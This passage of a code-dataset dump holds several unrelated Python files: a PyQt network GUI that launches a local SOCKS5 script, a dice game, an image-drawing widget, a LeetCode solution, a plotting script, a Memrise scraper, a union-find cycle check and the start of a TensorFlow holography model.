self.set_value(self.gw_list,gw_list)\n\n def clear_text(self):\n self.ui.textBrowser.clear()\n\n\n def start_stop_bn_enable(self, Flag):\n self.ui.start.setEnabled(Flag)\n self.ui.stop.setEnabled(Flag)\n\n def clear_ip_dns_gw(self):\n self.set_value(self.ip_list,None)\n self.set_value(self.dns_list,None)\n self.set_value(self.gw_list,None)\n self.wired_enable = False\n self.wifi_enable = False\n self.wired_info = None\n self.wifi_info = None\n self.IP = None\n self.DNS = None\n self.GW = None\n self.PORT = None\n self.socks5 = None \n\n def all_stop(self):\n self.stop_socks5()\n self.start_stop_bn_enable(False)\n self.clear_ip_dns_gw()\n\n def wired_bg_change(self):\n if self.wired_enable:\n self.start_stop_bn_enable(True)\n if self.ui.wired.isChecked():\n self.ui.wired.setStyleSheet(\"QPushButton{border-image: url(img/wired_press.png)}\")\n self.show_ip_gw_dns(self.wired_info)\n else:\n #self.clear_ip_dns_gw()\n self.ui.wired.setStyleSheet(\"QPushButton{border-image: url(img/wired_after.png)}\")\n\n def wifi_bg_change(self):\n if self.wifi_enable:\n self.start_stop_bn_enable(True)\n if self.ui.wifi.isChecked():\n self.ui.wifi.setStyleSheet(\"QPushButton{border-image: url(img/wifi_press.png)}\")\n self.show_ip_gw_dns(self.wifi_info)\n else:\n #self.clear_ip_dns_gw()\n self.ui.wifi.setStyleSheet(\"QPushButton{border-image: url(img/wifi_after.png)}\")\n\n\n #@pyqtSlot()\n def background_change(self):\n if self.ui.GetInfo.isChecked():\n self.ui.GetInfo.setStyleSheet(\"QPushButton{border-image: url(img/press.png)}\")\n network = Network()\n result = network.get_info()\n self.network_show_control(result)\n if self.wired_enable:\n self.ui.wired.setStyleSheet(\"QPushButton{border-image: url(img/wired_after.png)}\")\n else:\n self.ui.wired.setStyleSheet(\"QPushButton{border-image: url(img/wired_before.png)}\")\n if self.wifi_enable:\n self.ui.wifi.setStyleSheet(\"QPushButton{border-image: url(img/wifi_after.png)}\")\n else:\n self.ui.wifi.setStyleSheet(\"QPushButton{border-image: url(img/wifi_before.png)}\")\n #info = {\"a\":\"b\",\"c\":\"d\"}\n #self.ui.textBrowser.append(str(result))\n else:\n self.all_stop()\n 
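`start_socks5` above launches the helper with `shell=True` and then closes the child's pipes, which makes cleanup fragile. A hedged sketch of the more common argument-list form (the script path and flags mirror the command string above; the address values are placeholders):

```python
import subprocess

# Illustrative: pass an argument list so no shell is involved, and let
# terminate()/wait() reap the child instead of closing its pipes.
proc = subprocess.Popen(
    ["python", "./socks5_main.py", "--dns", "8.8.8.8", "--ip", "127.0.0.1", "--port", "1080"],
    stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
)
# ... later, on shutdown:
proc.terminate()
proc.wait(timeout=5)  # avoid leaving a zombie process behind
```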
self.ui.GetInfo.setStyleSheet(\"QPushButton{border-image: url(img/before.png)}\")\n            self.ui.wired.setStyleSheet(\"QPushButton{border-image: url(img/wired_before.png)}\")\n            self.ui.wifi.setStyleSheet(\"QPushButton{border-image: url(img/wifi_before.png)}\")\n            self.clean_network_info()\n    \n    def clean_network_info(self):\n        self.wired_info = None\n        self.wifi_info = None\n        self.wired_enable = False\n        self.wifi_enable = False\n\n    def network_show_control(self, network_info):\n        self.clean_network_info()\n        if len(network_info) > 0:\n            for i,item in enumerate(network_info):\n                if (\"Ethernet\" in item[\"Device\"] or \"Realtek\" in item[\"Device\"] ) and self.wired_info is None:\n                    self.wired_info = item\n                    self.wired_enable = True\n                if \"Wireless\" in item[\"Device\"] and self.wifi_info is None:\n                    self.wifi_info = item\n                    self.wifi_enable = True\n\n                self.ui.textBrowser.append(\"========Device%s=============\"%(str(i))) \n                for key,value in item.items():\n                    #print(key,value)\n                    self.ui.textBrowser.append(str(key)+\":\"+str(value)) \n            #print(self.wired_info,self.wired_enable) \n        else:\n            self.ui.textBrowser.append(\"No Device Found\")\n\n#    def paintEvent(self,event):\n#    \tqp.begin(self)\n#    \tg_x = self.ui.verticalLayout.geometry().x()\n #   \tg_y = self.ui.verticalLayout.geometry().y()\n    \t#print(1111)\n  #  \tprint(self.ui.IP1.x(),self.ui.IP1.y())\n  #  \tprint(self.ui.IP1.x(),self.ui.IP1.y())\n    \t#print(222)\n    \t#print(g_x,g_y)\n    \t#qp.drawRect(self.ui.IP1.geometry().x()+g_x,self.ui.IP1.geometry().y()+g_y,381,30)\n#    \tqp.end()\n\nif __name__ == '__main__':\n    \n    app = QApplication(sys.argv)\n    my_socks = My_socks()\n    my_socks.show()\n    sys.exit(app.exec_())\n","repo_name":"wangjm12138/Qt_double_network_change","sub_path":"main_orgin.py","file_name":"main_orgin.py","file_ext":"py","file_size_in_byte":11001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73947752804","text":"# The game \"21\"\n\n# ********************************************************\n# MODULE IMPORTS SECTION\n# ********************************************************\nimport random\n# ********************************************************\n# FUNCTION DEFINITIONS SECTION\n# ********************************************************\n\ndef kubiki():\n    kubiki = ['''\n ---\n| |\n| |\n| |\n ---\n''','''\n ---\n| |\n| * |\n| |\n ---\n''','''\n ---\n|* |\n| |\n| *|\n ---\n''','''\n ---\n|* |\n| * |\n| *|\n ---\n''','''\n ---\n|* *|\n| |\n|* *|\n ---\n''','''\n ---\n|* *|\n| * |\n|* *|\n ---\n''','''\n ---\n|* *|\n|* *|\n|* *|\n ---\n''']\n    return kubiki\n\ndef vopros(textVoprosa):\n    # This function returns True if the player wants to play again, otherwise False\n    while True:\n        print(textVoprosa)\n        otvet = input()\n        otvet = otvet.lower()\n        if (otvet == 'да') or (otvet == 'д') or (otvet == 'yes') or (otvet == 'y'):\n            # answered yes, start the game over\n            return True\n        elif (otvet == 'нет') or (otvet == 'н') or (otvet == 'no') or (otvet == 'n'):\n            # the player declined, we are done\n            return False\n        else:\n            print('I did not understand you! Enter your answer again.')\n\ndef help():\n    print('''    A player rolls two dice some number of times,\n    trying to reach a total of 21 points. They may stop\n    on any turn and pass the turn to the computer.\n    If they collect more than 21 points in total, they\n    are declared the loser.\n    When the turn passes to the computer, it also starts\n    rolling two dice, trying to score more points than the\n    player. As soon as it beats the player's score, the\n    game ends and the computer is declared the winner.\n    If, while trying to beat that score, the computer\n    collects more than 21 points, it loses.\n    If the computer scores the same number of points as\n    the player, a draw is declared.\n    ''')\n    print()\n    p = input('Press Enter to continue.')\n\ndef brosok():\n    k1 = random.randint(1,6)\n    k2 = random.randint(1,6)\n    sz = []\n    sz.append(k1)\n    sz.append(k2)\n    return sz\n\ndef display(gamer,image,k1,k2,sG,sK):\n    print(gamer)\n    print(image[k1])\n    print(image[k2])\n    print()\n    print('Player - '+str(sG)+'. Computer - '+str(sK)+'.')\n    print()\n\n# ********************************************************\n# MAIN PROGRAM BODY\n# ********************************************************\n\nif vopros('Would you like to read the rules? (yes or no).'):\n    help()\n\nktoBrosaet = 'Player'\nkub = kubiki()\nsummaK = 0\nsummaG = 0\ngame = True\ngamer = True\nkomputer = True\n\nwhile game:\n    while gamer:\n        kub1,kub2 = brosok()\n        summaG = summaG + kub1 + kub2\n        display(ktoBrosaet,kub,kub1,kub2,summaG,summaK)\n        if summaG > 21:\n            print('You lose!')\n            game = False\n            gamer = False\n        if game and not (input('(R)oll again or pass the turn?').upper() == 'R'):\n            gamer = False\n\n    \n    print('Passing the turn.')","repo_name":"IgorVash/MyPython","sub_path":"Python_2/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11802053490","text":"from PyQt5.QtWidgets import QLabel, QMessageBox\nimport PIL.Image as img\nfrom re import search\nfrom PyQt5.QtCore import Qt\n\n\nclass ImgLabel(QLabel):\n    def __init__(self, parent, how):\n        super().__init__(parent)\n        self.setStyleSheet(\"QLabel{border:1px solid#FFFFFF}\")\n        self.setFixedSize(400, 350)\n        self.how = how\n        self.father = parent\n        self.size_change = 1.0\n        self.mouse_down = False\n        self.x_move = 0\n        self.y_move = 0\n        self.img_size = [0, 0]\n        self.default_size = []\n        self.img_position = [0, 0]\n        self.file_path = None\n        mid_label = QLabel(self)\n        mid_label.setFixedSize(398, 348)\n        mid_label.move(1, 1)\n        self.img_label = QLabel(mid_label)\n        self.draw_list = []\n        self.all_draw = []\n        self.has_draw = False\n\n    # change the background image\n    def change_img(self, file_path=None, size=None, draw=None):\n        if size:\n            self.img_size = list(size)\n            self.img_label.setFixedSize(*size)\n        if file_path:\n            self.file_path = file_path\n        self.img_label.move(self.img_position[0], self.img_position[1])\n        if draw:\n            if draw not in self.all_draw:\n                self.all_draw.append([draw, self.father.is_draw, self.father.pen_bold])\n            if draw not in self.draw_list:\n                self.draw_list.append([draw, self.father.is_draw, self.father.pen_bold])\n            # flush the strokes to the image once more than 200 points have accumulated\n            if len(self.draw_list) > 200:\n                self.blit()\n        self.img_label.setStyleSheet(\"QLabel{background-image:url(%s);background-repeat:no-repeat;\"\n                                     \"background-position:center;border:none;}\" % self.file_path)\n\n    
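The `blit` method below writes every accumulated point with nested `putpixel` loops; Pillow's `ImageDraw` can stamp the same `pen_bold`-sized square with one call per point. A standalone sketch of the idea (canvas size and points are made up):

```python
from PIL import Image, ImageDraw

# Illustrative: draw one filled square per recorded point in a single call
# each, instead of a putpixel loop over every covered pixel.
image = Image.new("RGB", (200, 200), "white")
draw = ImageDraw.Draw(image)
points = [((50, 50), "#ff0000", 3), ((120, 80), "#0000ff", 5)]  # (xy, colour, bold)
for (x, y), colour, bold in points:
    draw.rectangle([x - bold, y - bold, x + bold, y + bold], fill=colour)
image.save("scribble.png")
```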
# mouse wheel event: zoom the image in or out\n    def wheelEvent(self, e):\n        if e.angleDelta().y() < 0 and self.size_change > 1.0:\n            self.size_change -= 0.1\n        elif e.angleDelta().y() > 0 and self.size_change < 3.0:\n            self.size_change += 0.1\n        if self.how == 1:\n            image = img.open(self.father.file_path)\n            image.thumbnail([400*self.size_change, 350*self.size_change])\n            save_path = 'images/temporarys/temporary.'+search(\"\\\\.(.*)$\", self.father.file_path).group(1).lower()\n        else:\n            image = img.open('images/exhibits/exhibit.'+self.father.category)\n            image.thumbnail([400 * self.size_change, 350 * self.size_change])\n            save_path = 'images/temporarys/temporary_exhibit.' + self.father.category\n        size = image.size\n        image.save(save_path)\n        image.close()\n        self.img_position = [(self.img_position[0]-e.x())*size[0]//self.img_size[0]+e.x(),\n                             (self.img_position[1] - e.y()) * size[1] // self.img_size[1] + e.y()]\n        self.change_img(save_path, size)\n\n    # draw the accumulated points onto the exhibit image\n    def blit(self):\n        self.has_draw = True\n        image = img.open('images/exhibits/exhibit.' + self.father.category)\n        for pos in self.draw_list:\n            for x in range(-pos[2], pos[2]+1):\n                for y in range(-pos[2], pos[2]+1):\n                    image.putpixel((pos[0][0] + x, pos[0][1] + y), (int(pos[1][1:3], 16), int(pos[1][3:5], 16), int(pos[1][5:], 16)))\n        image.save('images/exhibits/exhibit.' + self.father.category)\n        image.thumbnail([400 * self.size_change, 350 * self.size_change])\n        image.save('images/temporarys/temporary_exhibit.' + self.father.category)\n        image.close()\n        self.change_img()\n        # reset draw_list\n        self.draw_list = []\n\n    def re_blit(self):\n        image = img.open('images/exhibits/exhibit.' + self.father.category)\n        for pos in self.all_draw:\n            for x in range(-pos[2], pos[2]+1):\n                for y in range(-pos[2], pos[2]+1):\n                    image.putpixel((pos[0][0] + x, pos[0][1] + y), (int(pos[1][1:3], 16), int(pos[1][3:5], 16), int(pos[1][5:], 16)))\n        return image\n\n    # mouse press and release\n    def mousePressEvent(self, e):\n        if e.button() == Qt.LeftButton:\n            # refresh the size of the original image\n            image = img.open('images/exhibits/exhibit.'+self.father.category)\n            self.default_size = image.size\n            image.close()\n            if not self.father.is_draw or self.how == 1:\n                self.setCursor(Qt.ClosedHandCursor)\n            self.mouse_down = True\n            self.x_move = e.x()\n            self.y_move = e.y()\n\n    def mouseReleaseEvent(self, e):\n        if e.button() == Qt.LeftButton:\n            if self.how == 2 and self.draw_list:\n                self.blit()\n            self.setCursor(Qt.ArrowCursor)\n            self.mouse_down = False\n\n    def mouseMoveEvent(self, e):\n        if self.mouse_down:\n            # free-hand drawing\n            if self.father.is_draw and self.how == 2:\n                if self.father.category == 'gif':\n                    QMessageBox.warning(self.father, 'Warning!', 'GIF images cannot be drawn on!', QMessageBox.Ok, QMessageBox.Ok)\n                elif min(400, self.img_position[0]+self.img_size[0]-2) >= e.x() >= max(self.img_position[0]+2, 0) and \\\n                        min(350, self.img_position[1] + self.img_size[1]-2) >= e.y() >= max(self.img_position[1]+2, 0):\n                    self.change_img(draw=[(e.x()-self.img_position[0])*self.default_size[0]//self.img_size[0],\n                                          (e.y() - self.img_position[1]) * self.default_size[1] // self.img_size[1]])\n            else:\n                # drag the image\n                if 400 >= self.img_position[0] + (e.x()-self.x_move) >= -self.img_size[0]:\n                    self.img_position[0] += (e.x() - self.x_move)\n                if 350 >= self.img_position[1] + (e.y() - self.y_move) >= -self.img_size[1]:\n                    self.img_position[1] += (e.y() - self.y_move)\n                self.change_img()\n            self.x_move = e.x()\n            self.y_move = e.y()\n\n","repo_name":"yunyuyuan/PyQt5","sub_path":"图片处理/img_label.py","file_name":"img_label.py","file_ext":"py","file_size_in_byte":5959,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"40573526931","text":"from typing import List\nfrom collections import defaultdict, Counter\nfrom itertools import chain\n\n\nclass Solution:\n    def minJumps(self, arr: List[int]) -> int:\n        n = len(arr)\n        start, end = 0, n-1\n\n        reached, frontier, matches = set(), {start}, defaultdict(list)\n        for i, num in enumerate(arr):\n            matches[num].append(i)\n\n        def next_states(i):\n            yield from (j for j in chain([i-1, i+1], matches[arr[i]]) if i != j and 0 <= j < n)\n            matches[arr[i]] = []\n\n        levels = 0\n        while frontier:\n            if end in 
frontier:\n return levels\n newfrontier = {j for i in frontier for j in next_states(i)}\n reached.update(frontier)\n frontier = newfrontier.difference(reached)\n levels += 1\n\n return levels\n ","repo_name":"samiabat/LeetCode-Challenge","sub_path":"1345-jump-game-iv/1345-jump-game-iv.py","file_name":"1345-jump-game-iv.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"16218850658","text":"import matplotlib.pyplot as plt\nimport math\nimport numpy\n\n###########################################\ndef ReadDataFromFile(name_of_the_file=\"\"):\n\tx = []\n\ty = []\n\tfile = open(name_of_the_file, \"r\")\n\tcontents = file.readlines()\n\tcounter = 1\n\tfor line in contents:\n\t\tnumbers = line.split(\"\\t\")\n\t\tcounter += 1\n\t\tx.append(float(numbers[0]))\n\t\ty.append(float(numbers[1]))\n\tfile.close()\n\treturn x, y\n###########################################\n\n\"\"\"\nHere we define the files to print\n\"\"\"\n## read first file data\nx1, y1 = ReadDataFromFile(\"data/2w_1e-3.txt\")\nplt.plot(x1, y1, \"g\", label = \"2 Way, dt=1e-3 s\", linewidth=2)\n\nx2, y2 = ReadDataFromFile(\"data/2w_1e-4.txt\")\nplt.plot(x2, y2, \"blue\", label = \"2 Way, dt=1e-4 s\", linewidth=2)\n\nx3, y3 = ReadDataFromFile(\"data/2w_1e-5.txt\")\nplt.plot(x3, y3, \"cyan\", label = \"2 Way, dt=1e-5 s\", linewidth=2)\n\nx3, y3 = ReadDataFromFile(\"data/2w_5e-6.txt\")\nplt.plot(x3, y3, \"black\", label = \"2 Way, dt=5e-6 s\", linewidth=2)\n\n## read first file data\nx1, y1 = ReadDataFromFile(\"data/1w_1e-3.txt\")\nplt.plot(x1, y1, \"g+\", label = \"1 Way, dt=1e-3 s\", linewidth=2)\n\nx2, y2 = ReadDataFromFile(\"data/1w_1e-4.txt\")\nplt.plot(x2, y2, \"b+\", label = \"1 Way, dt=1e-4 s\", linewidth=2)\n\nx3, y3 = ReadDataFromFile(\"data/1w_1e-5.txt\")\nplt.plot(x3, y3, \"c+\", label = \"1 Way, dt=1e-5 s\", linewidth=2)\n\nx3, y3 = ReadDataFromFile(\"data/1w_5e-6.txt\")\nplt.plot(x3, y3, \"k+\", label = \"1 Way, dt=5e-6 s\", linewidth=2)\n\n# markersize=10\n\n# Constant values\n# x = numpy.arange(10,20,0.2)\n# y = 80*numpy.ones(len(x), dtype=float)\n# plt.plot(x, y, \"b-\", label = \"ref_value\", linewidth=2)\n\n\n# Error bar\n#xe, ye = ReadDataFromFile(\"error.txt\")\n#plt.errorbar(xe, ye , label=\"error_bar\", yerr=0.5e4, ecolor=\"lightgrey\", errorevery=1,\n #fmt='grey', capsize=5)\n\n\n#####################################################################\n#####################################################################\n\"\"\"\nHere we set the axes and limits\n\"\"\"\nx_max = 0.22\nx_min = 0.1\ny_max = -5e-2\ny_min = -6.4e-2\nx_interval = 0.02\ny_interval = 0.2e-2\n\nx_ticks = numpy.arange(x_min, x_max, x_interval)\nplt.xticks(x_ticks, fontsize = 12)\n\ny_ticks = numpy.arange(y_min, y_max, y_interval)\nplt.yticks(y_ticks, fontsize = 12)\n\nplt.xlim(x_min, x_max)\nplt.ylim(y_min, y_max)\n\n# plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\nplt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n\n\n#####################################################################\n#####################################################################\n\n\"\"\"\nHere we put the labels and titles of the plot\n\"\"\"\nplt.xlabel('Time [s]', fontsize = 12)\nplt.ylabel('Displacement [m]', fontsize = 12)\n#plt.title('Three point bending', fontsize = 12)\nplt.legend(fontsize = 
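`ReadDataFromFile` above splits each tab-separated line by hand; `numpy.loadtxt` performs the same split-and-convert in one call. A sketch assuming the same two-column, tab-separated layout:

```python
import numpy

def read_data(name_of_the_file: str):
    # Illustrative equivalent of ReadDataFromFile for "x<tab>y" rows.
    data = numpy.loadtxt(name_of_the_file, delimiter="\t")
    return data[:, 0], data[:, 1]

# x, y = read_data("data/2w_1e-3.txt")
```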
13)\nplt.grid()\nplt.show()\n\n\n\n\n\n\n#####################################################################\n#####################################################################\n# Settings\n\"\"\"\n'.'\tpoint marker\n','\tpixel marker\n'o'\tcircle marker\n'v'\ttriangle_down marker\n'^'\ttriangle_up marker\n'<'\ttriangle_left marker\n'>'\ttriangle_right marker\n'1'\ttri_down marker\n'2'\ttri_up marker\n'3'\ttri_left marker\n'4'\ttri_right marker\n's'\tsquare marker\n'p'\tpentagon marker\n'*'\tstar marker\n'h'\thexagon1 marker\n'H'\thexagon2 marker\n'+'\tplus marker\n'x'\tx marker\n'D'\tdiamond marker\n'd'\tthin_diamond marker\n'|'\tvline marker\n'_'\thline marker\n\"\"\"\n\n\"\"\"\n'-'\tsolid line style\n'--'\tdashed line style\n'-.'\tdash-dot line style\n':'\tdotted line style\n\"\"\"\n\n\"\"\"\n'b'\tblue\n'g'\tgreen\n'r'\tred\n'c'\tcyan\n'm'\tmagenta\n'y'\tyellow\n'k'\tblack\n'w'\twhite\n\"\"\"\n\n#####################################################################\n#####################################################################","repo_name":"AlejandroCornejo/Suport-Code","sub_path":"plots/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24626370336","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\nfrom typing import Any, List, Tuple\nfrom .const import PAGE, LANGCODES\n\n# ******* Function Define ********\n\n# ---------------- Function -----------------------\n# Name: _open_soup(URL)\n# Type: Local function\n# Feature: Return the Soup of the Level or Course URL\n# --------------------------------------------------\n\n\ndef _open_soup(url: str):\n html = requests.get(url)\n soup = BeautifulSoup(html.text, \"html.parser\")\n return soup\n\n\n# ---------------- Function -----------------------\n# Name: _get_name(Tag,Soup)\n# Type: Local function\n# Feature: Return the name of the level or the course\n# --------------------------------------------------\n\n\ndef _get_name(tag_chr: str, soup: BeautifulSoup):\n tag = soup.find(tag_chr)\n # Must be encoded cause tag.text -> return str (UNICODE Python 3)\n name = tag.text.strip()\n return name\n\n\n# ---------------- Function -----------------------\n# Name: _get_words (Soup,CoureID,LevelID)\n# Type: Local function\n# Feature: Return list of record of words in Memrise\n# Format Record : (Word, Meaning, CourseID , LevelID)\n# --------------------------------------------------\n\n\ndef _get_words(\n soup: BeautifulSoup, course_id: Any, level_id: Any\n) -> List[Tuple[Any, Any, Any, Any]]:\n words = []\n meanings = []\n tags = soup(\"div\")\n count = 0\n # Filter with col_a & col_b\n for tag in tags:\n item = tag.get(\"class\")\n if item is None:\n continue\n if \"col_a\" in item:\n words.append(tag.text)\n if \"col_b\" in item:\n count += 1\n meanings.append(tag.text)\n records = list()\n # Get make words in records list: word | meaning | courseID | LevelID\n for i in range(count):\n record = (words[i], meanings[i], course_id, level_id)\n records.append(record)\n return records\n\n\n# ---------------- Function -----------------------\n# Name: _get_language(CourseID)\n# Type: Local function\n# Feature: Return the language name of the course lower\n# Format Record : (Word, Meaning, CourseID , LevelID)\n# --------------------------------------------------\n\n\ndef _get_language_code(soup):\n # url = f\"https://app.memrise.com/course/{courseid}/\"\n # res = requests.get(url)\n # soup = 
BeautifulSoup(res.text,'html.parser')\n tags = soup(\"a\")\n languages = []\n for tag in tags:\n href = tag[\"href\"]\n if re.match(\"/courses/(.+)/(.+)/\", href):\n text = re.findall(\"[a-z]+/$\", href)\n if len(text) > 0:\n languages.append(text[0][0:-1])\n else:\n # Do nothing\n ...\n language = languages[-1]\n if language == \"us\" or language == \"uk\":\n language = \"english\"\n else:\n # Do nothing\n ...\n return LANGCODES[language]\n\n\n# ******* Class Define **********\n\n# ------------------- Class ----------------------\n# Name: Level\n# Input: (Path,LevelID,CourseID)\n# Path Format: \"/course/{CourseID}/{name-of-course}/{LevelID}/\"\n# Type: Public Class\n# Methods:\n# - `get_words()` -> List[Tuple[Word,Meaning,CourseID,LevelID]]\n# - `get_record()` -> Tuple[CourseID,LevelID,LevelName]\n# -------------------------------------------------\n\n\nclass Level:\n \"\"\"Level of the Memrise course infomation\\n\n Methods:\\n\n - `get_words()` : get all the words in the current level\n - `get_record()` : get the information about the current level\"\"\"\n\n def __init__(self, path, LevelID, CourseID):\n __page_tmp = PAGE + path\n self.__page = __page_tmp\n self.__soup = _open_soup(self.__page)\n __name_tmp = _get_name(\"h3\", self.__soup)\n self.__name = __name_tmp\n self.__words = _get_words(self.__soup, CourseID, LevelID)\n self.__record = tuple([CourseID, LevelID, self.__name])\n\n def get_words(self) -> List[Any]:\n return self.__words\n\n def get_record(self) -> Tuple[Any, ...]:\n return self.__record\n\n\n# ------------------- Class ----------------------\n# Name: Course\n# Input: (CourseID,LanguageID)\n# Type: Public Class\n# Methods:\n# - `get_levels()` -> List[Level]\n# - `get_record()` -> Tuple[CourseID,Name,LanguageID]\n# -------------------------------------------------\n\n\nclass Course:\n \"\"\"Course of Memrise information\\n\n Methods:\\n\n - `get_levels()` : get all the words in the current level\n - `get_record()` : get the information about the current level\"\"\"\n\n def __init__(self, course_id: int):\n __page_tmp = PAGE + \"/course/\" + str(course_id)\n self.__page = __page_tmp\n self.__soup = _open_soup(self.__page)\n self.course_id = course_id\n __name_tmp = _get_name(\"h1\", self.__soup)\n __language = _get_language_code(self.__soup)\n self.__name = __name_tmp\n self.__record = tuple([course_id, self.__name, __language])\n self.__levels = self.__get_levels(self.__soup)\n\n def get_levels(self) -> List[Level]:\n return self.__levels\n\n def __get_levels(self, soup) -> List[Level]:\n # Get all levels with Regular Expression End with \"Digital/\"\n tags = soup(\"a\")\n levels = list()\n expr = \"/(\\\\d)+/$\" # End with \"{digital}/\"\n count = 1\n for tag in tags:\n item = tag.get(\"href\", None)\n if re.search(expr, item) is not None:\n level = Level(item, count, self.course_id)\n levels.append(level)\n count += 1\n return levels\n\n def get_record(self) -> Tuple[Any, ...]:\n return self.__record\n","repo_name":"tquangsdh20/memrise","sub_path":"memrise/extract/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"39169403238","text":"from Graphs_Trees.Graph import Graph\n\nclass UnionFind:\n def __init__(self):\n self.g = Graph()\n bidir = False\n self.g.addEdge(0,1,bidirectional=bidir)\n self.g.addEdge(1,2,bidirectional=bidir)\n self.g.addEdge(2,0,bidirectional=bidir)\n self.parent = [-1] * len(self.g.vertices)\n \n def 
find(self, i):\n        # find the root of i, compressing the path along the way\n        if self.parent[i]==-1:\n            return i\n        else:\n            self.parent[i] = self.find(self.parent[i]) # update the parent on the way along to reduce the time complexity of next iterations\n            return self.parent[i]\n    \n    def find_len(self,x):\n        # height of the chain from x up to its root (recurse on the parent,\n        # not on x itself, which would never terminate)\n        if self.parent[x] == -1:\n            return 1\n        else:\n            return 1+self.find_len(self.parent[x])\n    def union(self,x,y):\n        x_parent = self.find(x)\n        y_parent = self.find(y)\n        #find the length of each tree and attach the shorter tree's root under the taller one, so the final height is as small as possible\n        x_len = self.find_len(x)\n        y_len = self.find_len(y)\n        if x_len>y_len:\n            self.parent[y_parent] = x_parent\n        else:\n            self.parent[x_parent] = y_parent\n    \n    def isCyclic(self):\n        for i in self.g.graph:\n            for j in self.g.graph[i]:\n                x = self.find(i)\n                y = self.find(j)\n                if(x==y):\n                    return True\n                self.union(x, y)\n        return False\n    \nif __name__==\"__main__\":\n    obj = UnionFind()\n    print(\"Does not contain cycle\" if obj.isCyclic() is False else \"Contains cycle\")","repo_name":"gmadhwani01/Algorithms-Python","sub_path":"Code/Graphs_Trees/UnionFind.py","file_name":"UnionFind.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13710482148","text":"import numpy as np\nimport os\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '1'\nimport tensorflow as tf\nfrom tensorflow.keras import Model, Input, layers\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.applications.vgg19 import VGG19\nfrom tensorflow.keras.applications.vgg19 import preprocess_input\nfrom tensorflow.keras.backend import clear_session\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\nfrom utils import _get_input_fn\nfrom datetime import datetime\nfrom tkinter import Tk  # from tkinter import Tk for Python 3.x\nfrom tkinter import filedialog\n\nprint(\"Num GPUs Available: \", len(tf.config.experimental.list_physical_devices('GPU')))\nphysical_devices = tf.config.list_physical_devices('GPU')\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\n\ntb_path = \"./logs/\"\n\n\n# tf.compat.v1.enable_eager_execution()\n\nclass CGHNet:\n    def __init__(self, dataprovider):\n        self.path = Path(os.getcwd())\n        self.training_data = dataprovider.get_training_data()\n        self._trained = False\n        self.dataprovider = dataprovider\n        self.lr = dataprovider.lr\n        self.phase_factors = dataprovider.phase_factors\n        self.input_shape = (self.dataprovider.Mx, self.dataprovider.My, self.dataprovider.My)\n        self.model_name = \"MODEL-Mx{}-My{}-nz{}-lp{}-nT{}-bs{}-eps{}\".format(self.dataprovider.Mx,\n                                                                              self.dataprovider.My,\n                                                                              self.dataprovider.My,\n                                                                              self.dataprovider.lp,\n                                                                              self.dataprovider.nT,\n                                                                              self.dataprovider.batchsize,\n                                                                              self.dataprovider.epochs)\n        existing_path = self.path / \"saved_models\" / self.model_name\n        if os.path.exists(existing_path):\n            print(\"Such a model already exists.\")\n            new_model_answer = input(\"Would you like to create new model? 
[y/N] \")\n if new_model_answer == \"y\":\n print(\"Building new model\")\n self.pretrained = False\n self.model = self.build_model()\n else:\n print(\"Loading existing model\")\n root = Tk()\n root.update()\n model_path = filedialog.askdirectory(title=\"Select saved model folder\", initialdir=str(self.path / \"saved_models\"))\n root.destroy()\n self.model = tf.keras.models.load_model(model_path, custom_objects={\"_deinterleave\": self._deinterleave,\n \"_prop_to_slm\": self._prop_to_slm,\n \"_interleave\": self._interleave,\n \"_loss_func\": self._loss_func})\n self.pretrained = True\n else:\n self.pretrained = False\n self.model = self.build_model()\n\n\n def _prop_to_slm(self, inputs):\n # We need to propagate the input backwards to the SLM with ifft2\n real, imag = inputs\n field_z0 = tf.complex(tf.squeeze(real, axis=-1), 0.) * tf.exp(tf.complex(0., tf.squeeze(imag, axis=-1)))\n shift = tf.signal.ifftshift(field_z0, axes=[1, 2])\n #field_slm = tf.signal.ifft2d(shift)\n slm = tf.math.angle(tf.signal.ifft2d(shift))\n return tf.expand_dims(slm, axis=-1)\n\n def _prop_to_planes(self, slm_phase):\n # Then propagate to the z planes we have defined\n phi_slm = tf.complex(np.float32(0.), tf.squeeze(slm_phase, axis=-1))\n phi_slm = tf.math.exp(phi_slm)\n\n output_list = []\n for i, factor in enumerate(self.phase_factors):\n if i != len(self.phase_factors) // 2:\n H = tf.broadcast_to(tf.expand_dims(factor, axis=0), tf.shape(phi_slm))\n phi_slm *= tf.signal.fftshift(H, axes=[1, 2])\n fft = tf.signal.ifftshift(tf.signal.fft2d(tf.signal.fftshift(phi_slm, axes=[1, 2])), axes=[1, 2])\n I = tf.cast(tf.math.square(tf.math.abs(fft)), tf.float32)\n output_list.append(tf.squeeze(I))\n return tf.stack(output_list, axis=-1)\n\n\n def _loss_func(self, y_true, y_pred):\n y_predict = self._prop_to_planes(y_pred)\n num = tf.reduce_sum(y_predict * y_true, axis=[1, 2, 3])\n denom = tf.sqrt(\n tf.reduce_sum(tf.pow(y_predict, 2), axis=[1, 2, 3]) * tf.reduce_sum(tf.pow(y_true, 2), axis=[1, 2, 3]))\n\n sq_err = tf.reduce_mean((num + 1) / (denom + 1), axis=0)\n return 1 - sq_err\n\n # LAYERS\n def _cc_layer(self, n_feature_maps, input):\n x = layers.Conv2D(n_feature_maps, (3, 3), 